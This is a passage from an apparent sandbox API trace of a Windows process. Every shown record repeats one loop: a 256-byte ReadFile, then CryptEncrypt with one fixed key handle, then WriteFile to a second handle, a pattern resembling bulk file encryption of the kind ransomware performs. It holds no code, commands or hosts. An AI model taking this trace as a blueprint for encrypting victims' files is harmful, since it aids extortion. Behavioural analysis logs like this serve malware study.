pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.985] GetLastError () returned 0x0 [0144.985] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.985] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.985] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.985] GetLastError () returned 0x0 [0144.985] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.985] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.986] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.986] GetLastError () returned 0x0 [0144.986] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.986] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.986] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.986] GetLastError () returned 0x0 [0144.986] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.986] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.986] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.986] GetLastError () returned 0x0 [0144.986] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.986] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.986] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.986] GetLastError () returned 0x0 [0144.986] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.986] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.986] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.986] GetLastError () returned 0x0 [0144.986] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.987] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.987] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.987] GetLastError () returned 0x0 [0144.987] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.987] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.987] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.987] GetLastError () returned 0x0 [0144.987] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.987] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.987] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.987] GetLastError () returned 0x0 [0144.987] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.987] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.987] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.987] GetLastError () returned 0x0 [0144.987] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.987] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.987] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.987] GetLastError () returned 0x0 [0144.988] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.988] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.988] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.988] GetLastError () returned 0x0 [0144.988] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.988] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.988] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.988] GetLastError () returned 0x0 [0144.988] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.988] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.988] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.988] GetLastError () returned 0x0 [0144.988] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.988] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.988] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.988] GetLastError () returned 0x0 [0144.988] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.988] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.988] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.988] GetLastError () returned 0x0 [0144.989] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.989] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.989] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.989] GetLastError () returned 0x0 [0144.989] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.989] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.989] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.989] GetLastError () returned 0x0 [0144.989] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.989] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.989] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.989] GetLastError () returned 0x0 [0144.989] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.989] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.989] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.989] GetLastError () returned 0x0 [0144.989] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.989] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.989] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.989] GetLastError () returned 0x0 [0144.989] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.990] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.990] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.990] GetLastError () returned 0x0 [0144.990] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.990] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.990] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.990] GetLastError () returned 0x0 [0144.990] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.990] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.990] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.990] GetLastError () returned 0x0 [0144.990] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.990] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.990] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.990] GetLastError () returned 0x0 [0144.990] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.990] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.991] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.991] GetLastError () returned 0x0 [0144.991] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.991] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.991] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.991] GetLastError () returned 0x0 [0144.991] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.991] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.991] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.991] GetLastError () returned 0x0 [0144.991] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.991] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.991] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.991] GetLastError () returned 0x0 [0144.991] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.991] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.991] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.991] GetLastError () returned 0x0 [0144.991] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.991] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.992] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.992] GetLastError () returned 0x0 [0144.992] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.992] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.992] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.992] GetLastError () returned 0x0 [0144.992] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, 